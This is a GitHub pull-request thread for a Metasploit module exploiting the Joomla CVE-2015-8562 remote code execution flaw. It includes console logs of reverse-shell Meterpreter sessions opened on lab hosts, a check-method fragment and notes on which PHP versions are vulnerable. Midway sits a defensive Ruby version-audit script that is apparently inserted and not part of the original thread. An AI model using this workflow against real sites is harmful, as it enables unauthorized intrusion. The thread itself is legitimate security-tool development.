Add 2015-8562 - Joomla RCE module #6355

Merged
merged 19 commits into from Dec 16, 2015

@FireFart
Contributor

FireFart commented Dec 15, 2015

This exploit only works on PHP versions before 5.4.45 (including 5.3.x), 5.5.29 and 5.6.13.

Vulnerable Version:
https://github.com/joomla/joomla-cms/releases/tag/3.4.5

msf exploit(joomla_user_agent_rce) > show options

Module options (exploit/multi/http/joomla_user_agent_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HEADER     USER-AGENT       yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.211.55.23     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The path to joomla
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Joomla


msf exploit(joomla_user_agent_rce) > run

[*] Started reverse handler on 10.211.55.2:4444
[*] Sending payload ...
[*] Sending stage (33068 bytes) to 10.211.55.23
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.23:60834) at 2015-12-15 17:22:22 +0100

^C[-] Exploit failed: Interrupt

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
@wchen-r7

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart The exploit doesn't work for me, so I imagine your exploit is meant to work against a specific setup? If so, I encourage you to write a check, also mention exactly what setup(s) should work in the module description. Thanks.

@FireFart

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 for me it only worked on a Ubuntu 12.04 install with PHP 5.3. Ubuntu 14.04 is currently not working (see first comment). I still need to investigate what changed between 12.04 and 14.04 that causes the module to not function.

@wchen-r7

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Thanks for the clarification. Would you like us to put this on hold (a Delayed label) so you and @wvu-r7 can continue working on it?

@FireFart

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 As you like. Either we update the description with the details and investigate later so the module is in master, or we do the checks first.

@FireFart

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 BTW: https://twitter.com/MarcS0h/status/676801098603216896 so maybe it's only working in PHP 5.3

@madmike33

madmike33 commented Dec 15, 2015

Will be waiting for any changes; it also doesn't work for me:
[*] Started reverse handler on 192.168.1.108:4444
[*] Sending payload ...
and nothing more. Thanks for the module :)

@wchen-r7

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Thanks. I will send you the check.

@wchen-r7

wchen-r7 commented Dec 15, 2015

@FireFart here you go (the check): FireFart#7

I didn't add more info in the description, I figured you know better than I do at this point :-)

@FireFart

Contributor

FireFart commented Dec 15, 2015

This is the "hidden" error message on Ubuntu 14.04:
Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO gutma_session (session_id, client_id, time) VALUES ('', 0, '1450199122')

So the first request inserts a NULL session into the database.

@FireFart

Contributor

FireFart commented Dec 15, 2015

Thanks @wchen-r7, but there is a bug in the check code:

[*] 10.211.55.23:80 - Found PHP version: 5.3.10
[-] 10.211.55.23:80 - This module currently does not work against this PHP version

@FireFart

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 I fixed the version check

@wchen-r7

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart Ah, thanks!

@lucyoa

Contributor

lucyoa commented Dec 15, 2015

This might help: https://bugs.php.net/bug.php?id=70219
"i think that if the previous deserialized session data is invalid, should not continue to follow deserialized because it may produce unexpected session data. so i update a new patch for this bug."

That's why it does not work on the latest PHP. Corrupted session data stops deserialization (in Joomla's case it is the size of the string in the previous array).

@FireFart

Contributor

FireFart commented Dec 15, 2015

@lucyoa thanks for finding this bug report!

@bgeesaman

bgeesaman commented Dec 15, 2015

Can anyone with a working target provide a "show create table #prefix_session;" from within their mysql db? Wondering if the default encoding of latin1 is correct. I've got a 12.04 running php 5.3.10-1ubuntu3.8 that just won't work no matter what I try. Thinking my setup differs somehow.

Here's mine. Thanks!

CREATE TABLE `pref_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1

@FireFart

Contributor

FireFart commented Dec 15, 2015

@bgeesaman:

mysql> show create table ebqur_session;
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Table         | Create Table                                                                                                                                                                                                                                                                                                                                                                                                                       |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ebqur_session | CREATE TABLE `ebqur_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>

@bgeesaman

bgeesaman commented Dec 15, 2015

@FireFart Thanks for helping with that. It looks like the latin1 vs utf8 charset has no effect. Things look identical in the sessions table before/after.

@FireFart

Contributor

FireFart commented Dec 15, 2015

@bgeesaman maybe this helps. For further questions please refer to IRC to keep this pull request small and simple.

mysql> show variables like 'char%';
+--------------------------+----------------------------+
| Variable_name            | Value                      |
+--------------------------+----------------------------+
| character_set_client     | latin1                     |
| character_set_connection | latin1                     |
| character_set_database   | latin1                     |
| character_set_filesystem | binary                     |
| character_set_results    | latin1                     |
| character_set_server     | latin1                     |
| character_set_system     | utf8                       |
| character_sets_dir       | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)

@FireFart

Contributor

FireFart commented Dec 15, 2015

@wchen-r7 if the php bug @lucyoa linked to is correct, versions

<= 5.4.44 (http://www.php.net/ChangeLog-5.php#5.4.45)
<= 5.5.28 (http://www.php.net/ChangeLog-5.php#5.5.29)
<= 5.6.12 (http://www.php.net/ChangeLog-5.php#5.6.13)

should be vulnerable too.

@FireFart

Contributor

FireFart commented Dec 15, 2015

I updated the check method to include vulnerable PHP versions

FireFart added some commits Dec 16, 2015

@FireFart

Contributor

FireFart commented Dec 16, 2015

Debian's PHP version is now also checked.
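As an added example (not code from the PR or from the Metasploit module), here is the PHP version check this thread converges on, written from a patch-audit angle so an administrator can tell from collected X-Powered-By headers which servers still run a build that keeps deserializing corrupt session data. The hostnames and header values are constructed; the Debian-style version string and the regex that parses it are assumptions about how packages report versions.

```ruby
# Added example (not from the PR or the Metasploit module): classify a PHP
# version string against the release ranges worked out in this thread.
# Per https://bugs.php.net/bug.php?id=70219, PHP 5.4.45, 5.5.29 and 5.6.13
# stop deserializing a session once they hit corrupt data; everything in
# the 5.x line below those releases (5.3.x included) lacks that change.
#
# Input is the version as a server reports it in an X-Powered-By header or
# as a distro package names it, e.g. "PHP/5.3.10-1ubuntu3.8" (quoted in the
# thread) or "5.4.45-0+deb7u2" (constructed Debian-style string). Only the
# upstream x.y.z part is compared; the package suffix is ignored.

# First release of each 5.x line that carries the fix.
FIXED_IN = {
  4 => 45, # 5.4.45
  5 => 29, # 5.5.29
  6 => 13  # 5.6.13
}.freeze

# Returns [major, minor, patch] as integers, or nil when no x.y.z is present.
# Comparing integers rather than strings avoids the classic version-check
# mistake where "5.4.9" sorts after "5.4.45" lexically.
def parse_php_version(str)
  m = str.to_s.match(/(\d+)\.(\d+)\.(\d+)/)
  return nil unless m
  m.captures.map(&:to_i)
end

# Returns :vulnerable, :fixed or :unknown for a PHP version string.
# :unknown covers anything outside the 5.x ranges discussed in the thread.
def php_session_unserialize_status(str)
  ver = parse_php_version(str)
  return :unknown unless ver
  major, minor, patch = ver
  return :unknown unless major == 5
  return :vulnerable if minor < 4            # covered by the "<= 5.4.44" range
  return :unknown unless FIXED_IN.key?(minor)
  patch >= FIXED_IN[minor] ? :fixed : :vulnerable
end

# Constructed sample: "host header" lines as a fleet audit might collect
# them from each server's response headers.
SAMPLE_HEADERS = [
  'web1.example.test X-Powered-By: PHP/5.3.10-1ubuntu3.8',
  'web2.example.test X-Powered-By: PHP/5.4.45-0+deb7u2',
  'web3.example.test X-Powered-By: PHP/5.6.12',
  'web4.example.test Server: nginx'
].freeze

# Returns { host => status }. Only X-Powered-By values naming PHP are
# classified; a server that hides its PHP version is reported as :unknown.
def audit_php_headers(lines)
  lines.each_with_object({}) do |line, out|
    host, header = line.split(' ', 2)
    if header.to_s =~ %r{\AX-Powered-By:\s*PHP/}i
      out[host] = php_session_unserialize_status(header)
    else
      out[host] = :unknown
    end
  end
end

if $PROGRAM_NAME == __FILE__
  audit_php_headers(SAMPLE_HEADERS).each do |host, status|
    puts "#{host.ljust(20)} #{status}"
  end
end
```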

@FireFart

Contributor

FireFart commented Dec 16, 2015

@wvu-r7 @wchen-r7 I think the module is now ready for merging. I implemented all possible checks I could find, so the module will only be executed on valid targets.

@wchen-r7

Contributor

wchen-r7 commented Dec 16, 2015

@FireFart That's good, thanks. @wvu-r7 will handle it.

return Exploit::CheckCode::Safe
end
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

Just curious, does every Joomla come with joomla.xml? Because we could have done this with https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/joomla_version.rb?

@anantshri

anantshri Dec 16, 2015

Contributor

I suppose yes, this is one of the default files that comes with Joomla, similar to readme.html of WordPress. However, multiple ways to validate the version is always a good idea, because being one of the default files, in a lot of places this might be blocked by the server admins.

@FireFart

FireFart Dec 16, 2015

Contributor

@wchen-r7 by looking at the changes joomla/joomla-cms@3.4.5...3.4.6, the version is only updated in joomla.xml, so this might be the only reliable way to check the version. There might be some API calls which return the version based on the XML, but that would require more investigation. Looks like the joomla_version scanner could also check this file.

@wchen-r7

wchen-r7 Dec 16, 2015

Contributor

ok cool, thanks.

@wvu-r7

Contributor

wvu-r7 commented Dec 16, 2015

Lol, I'm going to gift this to @wchen-r7.

@wvu-r7 wvu-r7 assigned wchen-r7 and unassigned wvu-r7 Dec 16, 2015

@puntoCL

puntoCL commented Dec 16, 2015

[*] Started reverse handler on 192.168.0.5:4444
[*] xxx.xxx.xxx.xxx:80 - Sending payload ...
[*] Exploit completed, but no session was created.

@FireFart

Contributor

FireFart commented Dec 16, 2015

Now the 4-byte UTF-8 character is also randomized (thanks to @wvu-r7 for his prettier version than mine :D). Maybe we should move this method to Rex::Text:: later on.

@wchen-r7

Contributor

wchen-r7 commented Dec 16, 2015

@FireFart The exploit works for me, so I will merge it:

msf exploit(joomla_http_header_rce) > check
[*] 192.168.1.205:80 - The target appears to be vulnerable.
msf exploit(joomla_http_header_rce) > run

[*] Started reverse handler on 192.168.1.199:4444 
[*] 192.168.1.205:80 - Sending payload ...
[*] Sending stage (33068 bytes) to 192.168.1.205
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.205:53576) at 2015-12-16 17:53:45 -0600

meterpreter >

@wchen-r7 wchen-r7 merged commit 8c43ecb into rapid7:master Dec 16, 2015

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Dec 16, 2015

@wchen-r7 wchen-r7 changed the title from add joomla RCE module to Add 2015-8562 - Joomla RCE module Dec 17, 2015

@FireFart FireFart deleted the FireFart:joomla branch Dec 17, 2015

@FireFart

Contributor

FireFart commented Dec 17, 2015

Thanks @wvu-r7 and @wchen-r7!

@tranminhthien95

tranminhthien95 commented Apr 13, 2017

test

I have failed to create a session. Help me.

@h00die

Contributor

h00die commented Apr 14, 2017

If you believe there is a bug in the module, please add an issue instead of commenting on the PR. If you simply need help, ask in the IRC chat room #metasploit. Finally, for best results include more information such as joomla version, host OS version, etc.
